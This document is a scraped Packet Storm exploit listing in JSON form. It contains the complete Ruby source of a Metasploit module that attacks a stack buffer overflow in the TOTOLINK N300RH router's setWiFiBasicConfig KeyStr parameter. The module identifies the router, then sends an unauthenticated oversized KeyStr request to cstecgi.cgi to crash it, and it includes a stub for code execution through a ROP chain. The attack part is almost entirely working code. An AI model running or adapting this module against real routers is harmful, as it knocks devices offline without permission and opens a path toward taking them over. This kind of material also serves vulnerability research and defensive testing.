{“lastseen”:”2026-06-20T03:54:42″,”description”:”This is a Metasploit auxiliary module that targets a stack-based buffer overflow in the TOTOLINK N300RH router’s setWiFiBasicConfig CGI handler. The vulnerability occurs when the KeyStr parameter is copied into a fixed-size stack buffer without proper…”,”published”:”2026-06-19T00:00:00″,”modified”:”2026-06-19T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 TOTOLINK N300RH Buffer Overflow”,”source”:””,”references”:””,”id”:”PACKETSTORM:223862″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : TOTOLINK N300RH V6.1c.1390_B20191101 setWiFiBasicConfig KeyStr Stack Buffer Overflow Metasploit Module |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 151.0.3 (64 bits) |\\n | # Vendor : https:\/\/www.totolink.net\/home\/menu\/detail\/menu_listtpl\/download\/id\/188\/ids\/36.html |\\n ==================================================================================================================================\\n \\n [+] Summary : This is a Metasploit auxiliary module that targets a stack-based buffer overflow in the TOTOLINK N300RH router\u2019s setWiFiBasicConfig CGI handler. \\n The vulnerability occurs when the KeyStr parameter is copied into a fixed-size stack buffer without proper bounds checking.\\n \\n \\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Scanner\\n include Msf::Auxiliary::Report\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘TOTOLINK N300RH setWiFiBasicConfig KeyStr Stack Buffer Overflow’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a stack-based buffer overflow vulnerability in the\\n TOTOLINK N300RH wireless router. The vulnerability exists in the\\n `setWiFiBasicConfig` handler within `wireless.so` which copies the user-supplied\\n `KeyStr` parameter into a fixed-size stack buffer without proper bounds checking.\\n \\n The vulnerability can be triggered remotely without authentication, leading to\\n denial of service (process crash) and potentially arbitrary code execution.\\n \\n Tested successfully on firmware version V6.1c.1390_B20191101.\\n },\\n ‘Author’ =\\u003e [‘indoushka’],\\n ‘References’ =\\u003e [\\n [ ‘CWE’, ‘121’ ], \\n [ ‘URL’, ‘https:\/\/www.totolink.net\/home\/menu\/detail\/menu_listtpl\/download\/id\/188\/ids\/36.html’ ],\\n [ ‘URL’, ‘https:\/\/github.com\/Unknown\/Metasploit-TOTOLINK-N300RH’ ]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2024-01-30’, \\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e 80,\\n ‘SSL’ =\\u003e false\\n },\\n ‘Actions’ =\\u003e [\\n [‘CHECK’, { ‘Description’ =\\u003e ‘Check if target is a TOTOLINK N300RH router’ }],\\n [‘DOS’, { ‘Description’ =\\u003e ‘Trigger denial of service (process crash)’ }],\\n [‘EXPLOIT’, { ‘Description’ =\\u003e ‘Attempt arbitrary code execution (ROP chain required)’ }]\\n ],\\n ‘DefaultAction’ =\\u003e ‘DOS’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [ CRASH_SERVICE_DOWN ],\\n ‘Reliability’ =\\u003e [ REPEATABLE_SESSION ], # Only for DOS action\\n ‘SideEffects’ =\\u003e [ IOC_IN_LOGS, PHYSICAL_DEVICE_REBOOT ]\\n }\\n )\\n )\\n register_options([\\n OptString.new(‘TARGETURI’, [ true, ‘Base path to CGI endpoint’, ‘\/’ ]),\\n OptInt.new(‘KEYSTR_LENGTH’, [ false, ‘Length of KeyStr buffer (for DOS)’, 2000 ]),\\n OptString.new(‘KEYSTR_PATTERN’, [ false, ‘Pattern for KeyStr (e.g., A*2000)’, ‘A’ * 2000 ]),\\n OptBool.new(‘ENABLE_ROP’, [ false, ‘Enable ROP chain for code execution’, false ])\\n ])\\n register_advanced_options([\\n OptInt.new(‘CRASH_DETECTION_TIMEOUT’, [ true, ‘Seconds to wait for crash detection’, 10 ]),\\n OptString.new(‘WIFI_AUTH_MODE’, [ true, ‘AuthMode parameter’, ‘OPEN’ ]),\\n OptString.new(‘WIFI_KEY_TYPE’, [ true, ‘KeyType parameter’, ‘1’ ])\\n ])\\n end\\n def check_host(_ip)\\n print_status(\\”Checking #{peer} for TOTOLINK N300RH fingerprint…\\”)\\n begin\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/’)\\n })\\n if res.nil?\\n return Exploit::CheckCode::Unknown(‘No response from target’)\\n end\\n totolink_indicators = [\\n res.body.to_s =~ \/TOTOLINK\/i,\\n res.body.to_s =~ \/N300RH\/i,\\n res.headers[‘Server’].to_s =~ \/TOTOLINK\/i,\\n res.body.to_s =~ \/wr-300n\/i,\\n res.body.to_s =~ \/Geon Electronics\/i\\n ]\\n if totolink_indicators.any?\\n print_status(\\”TOTOLINK detected, attempting vulnerability probe…\\”)\\n probe_payload = {\\n ‘topicurl’ =\\u003e ‘setWiFiBasicConfig’,\\n ‘addEffect’ =\\u003e ‘0’,\\n ‘AuthMode’ =\\u003e datastore[‘WIFI_AUTH_MODE’],\\n ‘KeyType’ =\\u003e datastore[‘WIFI_KEY_TYPE’],\\n ‘KeyStr’ =\\u003e ‘A’ * 64 # Normal WiFi key length (64 hex chars for WPA2)\\n }\\n res2 = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘cgi-bin’, ‘cstecgi.cgi’),\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded; charset=UTF-8’,\\n ‘headers’ =\\u003e {\\n ‘X-Requested-With’ =\\u003e ‘XMLHttpRequest’\\n },\\n ‘data’ =\\u003e probe_payload.to_json\\n })\\n if res2 \\u0026\\u0026 res2.code == 200\\n return Exploit::CheckCode::Appears(‘Target appears to be TOTOLINK N300RH with vulnerable endpoint accessible’)\\n else\\n return Exploit::CheckCode::Detected(‘TOTOLINK detected but vulnerability probe failed’)\\n end\\n end\\n Exploit::CheckCode::Safe(‘Target does not appear to be a TOTOLINK N300RH router’)\\n rescue ::Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::ConnectionTimeout\\n Exploit::CheckCode::Unknown(‘Could not connect to target’)\\n rescue =\\u003e e\\n Exploit::CheckCode::Unknown(\\”Error during check: #{e.message}\\”)\\n end\\n end\\n def build_malicious_payload(crash_only = true)\\n payload_data = {\\n ‘topicurl’ =\\u003e ‘setWiFiBasicConfig’,\\n ‘addEffect’ =\\u003e ‘0’,\\n ‘AuthMode’ =\\u003e datastore[‘WIFI_AUTH_MODE’],\\n ‘KeyType’ =\\u003e datastore[‘WIFI_KEY_TYPE’]\\n }\\n if crash_only || !datastore[‘ENABLE_ROP’]\\n if datastore[‘KEYSTR_PATTERN’] \\u0026\\u0026 !datastore[‘KEYSTR_PATTERN’].empty?\\n key_str = datastore[‘KEYSTR_PATTERN’]\\n else\\n length = datastore[‘KEYSTR_LENGTH’] || 2000\\n key_str = ‘A’ * length\\n end\\n vprint_status(\\”Using DOS payload with #{key_str.length} bytes\\”)\\n else\\n print_warning(\\”Code execution requires ROP chain for firmware V6.1c.1390_B20191101\\”)\\n print_warning(\\”This is a placeholder – you need to implement the ROP chain\\”)\\n rop_chain = generate_mips_rop_chain\\n padding = ‘A’ * 1024 # Adjust offset based on reverse engineering\\n key_str = padding + rop_chain\\n end\\n payload_data[‘KeyStr’] = key_str\\n payload_data.to_json\\n end\\n def generate_mips_rop_chain\\n print_error(\\”ROP chain not implemented – set ENABLE_ROP false for DOS only\\”)\\n ‘A’ * 1024\\n end\\n def check_for_crash\\n print_status(\\”Checking if target crashed…\\”)\\n begin\\n Timeout.timeout(datastore[‘CRASH_DETECTION_TIMEOUT’]) do\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/’),\\n ‘timeout’ =\\u003e 5\\n })\\n if res.nil?\\n print_good(\\”Target is not responding – likely crashed\\”)\\n return true\\n elsif res.code == 200\\n print_warning(\\”Target still responding – may not have crashed\\”)\\n return false\\n end\\n end\\n rescue ::Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::ConnectionTimeout\\n print_good(\\”Connection failed – target likely crashed\\”)\\n return true\\n rescue Timeout::Error\\n print_good(\\”Timeout – target likely crashed\\”)\\n return true\\n end\\n false\\n end\\n def dos_exploit\\n print_status(\\”Preparing malicious request…\\”)\\n malicious_json = build_malicious_payload(true)\\n print_status(\\”Sending exploit payload to #{peer}\/cgi-bin\/cstecgi.cgi\\”)\\n print_status(\\”KeyStr length: #{datastore[‘KEYSTR_PATTERN’]\\u0026.length || datastore[‘KEYSTR_LENGTH’] || 2000} bytes\\”)\\n begin\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘cgi-bin’, ‘cstecgi.cgi’),\\n ‘ctype’ =\\u003e ‘application\/x-www-form-urlencoded; charset=UTF-8’,\\n ‘headers’ =\\u003e {\\n ‘X-Requested-With’ =\\u003e ‘XMLHttpRequest’,\\n ‘User-Agent’ =\\u003e ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko\/20100101 Firefox\/141.0’\\n },\\n ‘data’ =\\u003e malicious_json\\n })\\n if res\\n print_status(\\”HTTP Response: #{res.code}\\”)\\n if res.code == 200\\n print_good(\\”Request accepted – exploit sent successfully\\”)\\n else\\n print_warning(\\”Unexpected response code: #{res.code}\\”)\\n end\\n else\\n print_good(\\”No response received – exploit may have triggered immediately\\”)\\n end\\n rescue ::Errno::ECONNRESET, ::Rex::ConnectionRefused\\n print_good(\\”Connection reset – exploit likely triggered\\”)\\n rescue ::Rex::ConnectionTimeout\\n print_good(\\”Connection timeout – service may have crashed\\”)\\n rescue =\\u003e e\\n print_error(\\”Error sending exploit: #{e.message}\\”)\\n return false\\n end\\n print_status(\\”Waiting #{datastore[‘CRASH_DETECTION_TIMEOUT’]} seconds for crash…\\”)\\n sleep(datastore[‘CRASH_DETECTION_TIMEOUT’])\\n check_for_crash\\n end\\n def code_exec_exploit\\n print_warning(\\”Code execution not fully implemented\\”)\\n print_warning(\\”You need to:\\”)\\n print_warning(\\” 1. Reverse engineer the exact offset to return address\\”)\\n print_warning(\\” 2. Find ROP gadgets in the firmware\\”)\\n print_warning(\\” 3. Implement generate_mips_rop_chain method\\”)\\n print_warning(\\” 4. Test on actual hardware\\”)\\n if datastore[‘FORCE_EXPLOIT’]\\n print_status(\\”FORCE_EXPLOIT enabled, attempting anyway…\\”)\\n malicious_json = build_malicious_payload(false)\\n send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘cgi-bin’, ‘cstecgi.cgi’),\\n ‘data’ =\\u003e malicious_json\\n })\\n else\\n print_error(\\”Set FORCE_EXPLOIT=true to attempt anyway (not recommended)\\”)\\n end\\n end\\n def run_host(_ip)\\n if datastore[‘KEYSTR_PATTERN’] \\u0026\\u0026 !datastore[‘KEYSTR_PATTERN’].empty?\\n print_status(\\”Using custom KeyStr pattern of #{datastore[‘KEYSTR_PATTERN’].length} bytes\\”)\\n elsif datastore[‘KEYSTR_LENGTH’] \\u0026\\u0026 datastore[‘KEYSTR_LENGTH’] \\u003e 0\\n print_status(\\”Using KeyStr length: #{datastore[‘KEYSTR_LENGTH’]} bytes\\”)\\n elsif datastore[‘ACTION’] == ‘EXPLOIT’ \\u0026\\u0026 datastore[‘ENABLE_ROP’]\\n print_status(\\”Preparing ROP chain for code execution\\”)\\n else\\n print_status(\\”Using default DOS payload (2000 bytes)\\”)\\n end\\n case action.name\\n when ‘CHECK’\\n result = check_host(nil)\\n print_status(result.message)\\n report_note(\\n host: rhost,\\n port: rport,\\n type: ‘totolink.n300rh.check_result’,\\n data: result.message\\n )\\n return\\n when ‘DOS’\\n print_status(\\”Starting Denial of Service attack against #{peer}\\”)\\n crashed = dos_exploit\\n if crashed\\n print_good(\\”Successfully crashed target TOTOLINK N300RH!\\”)\\n print_warning(\\”The device may need to be power-cycled to restore full functionality\\”)\\n report_vuln(\\n host: rhost,\\n port: rport,\\n proto: ‘tcp’,\\n name: ‘TOTOLINK N300RH setWiFiBasicConfig KeyStr Stack Buffer Overflow’,\\n refs: references,\\n info: \\”Device successfully crashed via oversized KeyStr parameter\\”\\n )\\n else\\n print_error(\\”Target did not crash – vulnerability may be patched or different version\\”)\\n end\\n when ‘EXPLOIT’\\n if datastore[‘ENABLE_ROP’]\\n print_status(\\”Attempting code execution…\\”)\\n code_exec_exploit\\n else\\n print_error(\\”Code execution requires ENABLE_ROP=true and a valid ROP chain\\”)\\n print_error(\\”Falling back to DOS mode\\”)\\n dos_exploit\\n end\\n end\\n end\\n end\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/223862″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/223862\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-20T03:54:42″,”description”:”This is a Metasploit auxiliary module that targets a stack-based buffer overflow in the TOTOLINK N300RH router’s setWiFiBasicConfig CGI handler. The vulnerability occurs when the…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-64502","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n